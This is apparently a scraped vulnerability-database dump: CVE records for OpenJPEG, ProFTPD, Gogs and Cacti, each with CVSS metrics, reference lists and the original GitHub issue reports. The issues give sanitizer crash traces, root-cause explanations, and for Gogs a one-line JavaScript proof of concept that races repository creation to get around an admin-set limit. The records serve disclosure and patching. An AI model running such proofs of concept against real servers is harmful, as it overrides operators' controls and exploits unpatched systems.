[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/03/16/16" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/27/1" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1317826" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/725" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/03/16/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2016/09/27/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1317826" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/725" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "2063942E-E483-4E3C-89FB-1357F9F1189E", "versionEndExcluding": "2.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/uclouvain/openjpeg/issues/725
[ "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
# Vulnerability Details According to AddressSanitizer's output message, the Out-of-Bounds read occurred in function color_esycc_to_rgb. However, there must be also an Out-of-Bounds write circumstance since an exception will be throwed when freeing the heap buffer. - AddressSanitizer output the following exception information. ``` ==116473==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61300000e000 at pc 0x0000005309ef bp 0x7fffb332de20 sp 0x7fffb332de18 READ of size 4 at 0x61300000e000 thread T0 #0 0x5309ee in color_esycc_to_rgb openjpeg/src/bin/common/color.c:760:37 #1 0x4f215c in main openjpeg/src/bin/jp2/opj_decompress.c:1381:4 #2 0x7f50d46dd82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 #3 0x41a978 in _start (openjpeg/bin/opj_decompress+0x41a978) 0x61300000e000 is located 0 bytes to the right of 384-byte region [0x61300000de80,0x61300000e000) allocated by thread T0 here: #0 0x4bac30 in calloc (openjpeg/bin/opj_decompress+0x4bac30) #1 0x7f50d5fd9764 in opj_calloc openjpeg/src/lib/openjp2/opj_malloc.c:203:10 #2 0x7f50d5f4ce7a in opj_j2k_update_image_data openjpeg/src/lib/openjp2/j2k.c:8212:62 #3 0x7f50d5f4c886 in opj_j2k_decode_tiles openjpeg/src/lib/openjp2/j2k.c:9752:23 #4 0x7f50d5f153fd in opj_j2k_exec openjpeg/src/lib/openjp2/j2k.c:7341:41 #5 0x7f50d5f2844e in opj_j2k_decode openjpeg/src/lib/openjp2/j2k.c:9943:15 #6 0x7f50d5f636ce in opj_jp2_decode openjpeg/src/lib/openjp2/jp2.c:1487:8 #7 0x7f50d5f80356 in opj_decode openjpeg/src/lib/openjp2/openjpeg.c:412:10 #8 0x4f1627 in main openjpeg/src/bin/jp2/opj_decompress.c:1330:10 #9 0x7f50d46dd82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg/src/bin/common/color.c:760:37 in color_esycc_to_rgb Shadow bytes around the buggy address: 0x0c267fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c267fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c267fff9c00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c267fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==116473==ABORTING ``` - GDB backtrace If compile openjpeg with gcc and **do not** specify `-fsanitize=address`, a heap corruption will be occurred. ``` [INFO] Stream reached its end ! WARNING -> [PGM file] Only the first component is written to the file [INFO] Generated Outfile image.pgm Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x1f00000000) at malloc.c:2952 2952 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x1f00000000) at malloc.c:2952 #1 0x00007ffff7bc775d in opj_free (ptr=0x1f00000000) at opj_gcc/src/lib/openjp2/opj_malloc.c:238 #2 0x00007ffff7bc50e2 in opj_tcd_free_tile (p_tcd=0x626f00) at opj_gcc/src/lib/openjp2/tcd.c:1508 #3 0x00007ffff7bc2d1d in opj_tcd_destroy (tcd=0x626f00) at opj_gcc/src/lib/openjp2/tcd.c:616 #4 0x00007ffff7ba23e5 in opj_j2k_destroy (p_j2k=0x620440) at opj_gcc/src/lib/openjp2/j2k.c:7541 #5 0x00007ffff7bb09d5 in opj_jp2_destroy (jp2=0x620380) at opj_gcc/src/lib/openjp2/jp2.c:2778 #6 0x00007ffff7bb4515 in opj_destroy_codec (p_codec=0x6202d0) at opj_gcc/src/lib/openjp2/openjpeg.c:845 #7 0x000000000040682d in main (argc=5, argv=0x7fffffffdeb8) at opj_gcc/src/bin/jp2/opj_decompress.c:1558 ``` # Credit Ke Liu of Tencent's Xuanwu LAB
CVE-2016-3182 Heap Corruption in opj_free function
https://api.github.com/repos/uclouvain/openjpeg/issues/725/comments
2
2016-03-16T10:05:18Z
2016-09-13T08:27:02Z
https://github.com/uclouvain/openjpeg/issues/725
141,224,897
725
1,085
CVE-2020-9272
2020-02-20T16:15:11.857
ProFTPD 1.3.7 has an out-of-bounds (OOB) read vulnerability in mod_cap via the cap_text.c cap_to_text function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00002.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-679335.pdf" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/902" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00002.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-679335.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/902" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:proftpd:proftpd:*:*:*:*:*:*:*:*", "matchCriteriaId": "0CBC9526-A183-4F23-BD9A-4ACE11A4307C", "versionEndExcluding": "1.3.6c", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_net_cp_1543-1_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "572DFEC6-64D6-4187-91AB-571504E3F571", "versionEndExcluding": "3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_net_cp_1543-1:-:*:*:*:*:*:*:*", "matchCriteriaId": "F56C2BDC-928E-491A-8E7C-F976B3787C7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_net_cp_1545-1_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D4453FA-E3B2-4510-93F0-CC3FB5C3EE76", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_net_cp_1545-1:-:*:*:*:*:*:*:*", "matchCriteriaId": "1256EB4B-DD8A-4F99-AE69-F74E8F789C63", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:-:*:*:*:*:*:*", "matchCriteriaId": "D83DA865-E4A6-4FBF-AA1B-A969EBA6B2AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/proftpd/proftpd/issues/902
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "proftpd", "proftpd" ]
**This vulnerability was previously reported via email to security@proftpd.org and has been made public after the fix has been developed.** ### Credit This issue was discovered and reported by **GitHub Security Lab** team member @antonio-morales (Antonio Morales). ### Summary: An out-of-bounds (OOB) read vulnerability has been detected in mod_cap. ### Description: The "cap_to_text()" function on "cap_text.c" does a call to getstateflags(caps, n) [line 255]. When getstateflags(cap_t caps, int capno) is called, "capno" is equal to 37 so "isset_cap((__cap_s *)(&caps->set.inheritable),capno)" will be expanded to "&((__cap_s *)(&caps->set.inheritable))->_blk[(37)>>5]", accesing caps->set.ineritable[1] that is outside of "caps" struct bounds (0x603000001ae4 to 0x603000001af7 in our example) [Image1.png] As a result, OOB reads occurs resulting in accessing a memory location that is outside of the boundaries of the caps struct variable. This bug doesn't affect neither "set.effective" nor "set.permited". This is because in these cases "permited" and "inheritable" members are located just after them [Image2.png] Please let me know when you have fixed the bugs so that I can coordinate my disclosure with yours. For reference, here is a link to GitHub's vulnerability disclosure policy: https://securitylab.github.com/disclosures#policy Thank you, Antonio Morales GitHub Security Lab Team
Out-of-bounds read in mod_cap getstateflags() function
https://api.github.com/repos/proftpd/proftpd/issues/902/comments
6
2020-02-18T17:15:00Z
2020-02-21T15:54:52Z
https://github.com/proftpd/proftpd/issues/902
567,039,374
902
1,086
CVE-2020-9273
2020-02-20T16:15:11.950
In ProFTPD 1.3.7, it is possible to corrupt the memory pool by interrupting the data transfer channel. This triggers a use-after-free in alloc_pool in pool.c, and possible remote code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00002.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/08/25/1" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/09/06/2" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-679335.pdf" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/903" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00022.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00002.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCUPRYSJR7XOM3HQ6H5M4OGDU7OHCHBF/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XHO3S5WPRRP7VGKIAHLYQVEYW5HRYIJN/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-35" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4635" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00002.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/08/25/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/09/06/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-679335.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/proftpd/proftpd/issues/903" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00002.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VCUPRYSJR7XOM3HQ6H5M4OGDU7OHCHBF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XHO3S5WPRRP7VGKIAHLYQVEYW5HRYIJN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4635" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:proftpd:proftpd:1.3.7:*:*:*:*:*:*:*", "matchCriteriaId": "9840D8DB-F09B-47C2-871E-89247B841871", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:-:*:*:*:*:*:*", "matchCriteriaId": "D83DA865-E4A6-4FBF-AA1B-A969EBA6B2AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_net_cp_1545-1_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A46FF27-6B0D-4606-9D7B-45912556416F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_net_cp_1545-1:-:*:*:*:*:*:*:*", "matchCriteriaId": "1256EB4B-DD8A-4F99-AE69-F74E8F789C63", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:siemens:simatic_net_cp_1543-1_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "572DFEC6-64D6-4187-91AB-571504E3F571", "versionEndExcluding": "3.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:siemens:simatic_net_cp_1543-1:-:*:*:*:*:*:*:*", "matchCriteriaId": "F56C2BDC-928E-491A-8E7C-F976B3787C7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "416" ]
416
https://github.com/proftpd/proftpd/issues/903
[ "Third Party Advisory" ]
github.com
[ "proftpd", "proftpd" ]
**This vulnerability was previously reported via email to security@proftpd.org and has been made public after the fix has been developed.** ### Credit This issue was discovered and reported by GitHub Security Lab team member @antonio-morales (Antonio Morales). ### Summary A use-after-free vulnerability exists in ProFTPD. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system. ### Product ProFTPD ### Tested Version ProFTPD (development version) ### Details #### Use-after-free vulnerability in memory pool allocator It is possible to corrupt the ProFTPd memory pool by interrupting current data transfer (PoC Exploit Demo Video.webm). In our PoC, the program crashes on "alloc_pool" function (pool.c). This function executes the instruction first_avail = blok->h.first_avail. As you can see, the right side operand of the assignment in pool.c:569 is p->last (Image1.png). However, the problem is that "p" is a corrupted pool (Image2.png). The source of the problem comes from pcalloc call in netio.c:1066 (Image3.png). This function calls again to the "alloc_pool" function which calls to "new_block" to obtain a new freed memory block (Image4.png). But the memory block returned by "new_block" is referenced by the "p" pool. So, in short, "p" is a dangling pointer due to an use-after-free vulnerability. It's important to note that our tests have shown that this vulnerability can also lead to other vulnerabilities (such as OOB write), so it increases the severity of the vulnerability. ### Impact This issue may lead to Post-Auth RCE (maybe FTP anonymous users are also affected). ### Disclosure Policy This report is subject to a 90 day coordinated disclosure policy. The disclosure deadline for the findings outlined in this report is: 2020-04-21
Use-after-free vulnerability in memory pools during data transfer
https://api.github.com/repos/proftpd/proftpd/issues/903/comments
3
2020-02-18T17:27:21Z
2020-02-22T16:10:47Z
https://github.com/proftpd/proftpd/issues/903
567,046,320
903
1,087
CVE-2020-9329
2020-02-21T22:15:10.880
Gogs through 0.11.91 allows attackers to violate the admin-specified repo-creation policy due to an internal/db/repo.go race condition.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gogs/gogs/issues/5926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gogs/gogs/issues/5926" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*", "matchCriteriaId": "EA2B75BE-EE0C-4E9B-8ACD-DD233A9EBAA7", "versionEndExcluding": null, "versionEndIncluding": "0.11.91", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/gogs/gogs/issues/5926
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gogs", "gogs" ]
## Description Users could potentially create more repos than specified in MaxCreationLimit as NumRepos field is not updated in a race-condition-safe cavalier (i.e. row is not locked). Such logic error could be fatal in some specific settings. ## Reason internal/db/repo.go:1108 ```go func CreateRepository(doer, owner *User, opts CreateRepoOptions) (_ *Repository, err error) { // check first if !owner.CanCreateRepo() { return nil, errors.ReachLimitOfRepo{owner.RepoCreationNum()} } // some time-consuming operations ... // update numrepo if err = createRepository(sess, doer, owner, repo); err != nil { return nil, err } ... } ``` ## PoC Execute following script in the console of the user: ```javascript [0,1,2,3,4,5,6,7,8,9].forEach((v)=>{$.post("/repo/create", "_csrf=[YOUR CSRF TOKEN]&user_id=[YOUR ID]&repo_name=ccc" + v +"&description=&gitignores=&license=&readme=Default")}) ``` The resultant NumRepos is less than 10 (it is 2~4 in my settings) though 10 repos are created. ## Solution Indeed, some other fields also need locking but are not that crucial to the integrity of the system. ```go type User struct { ... NumFollowers int // <- add optimistic lock here NumFollowing int `xorm:"NOT NULL DEFAULT 0"` // <- add optimistic lock here NumStars int // <- add optimistic lock here NumRepos int // <- add optimistic lock here ... } ``` Or stop using fields in user table to save the value as it could be counted directly by using repository table.
Race condition can make MaxCreationLimit useless
https://api.github.com/repos/gogs/gogs/issues/5926/comments
7
2020-02-19T18:09:37Z
2022-08-15T12:41:56Z
https://github.com/gogs/gogs/issues/5926
567,743,100
5,926
1,088
CVE-2020-8813
2020-02-22T02:15:10.553
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
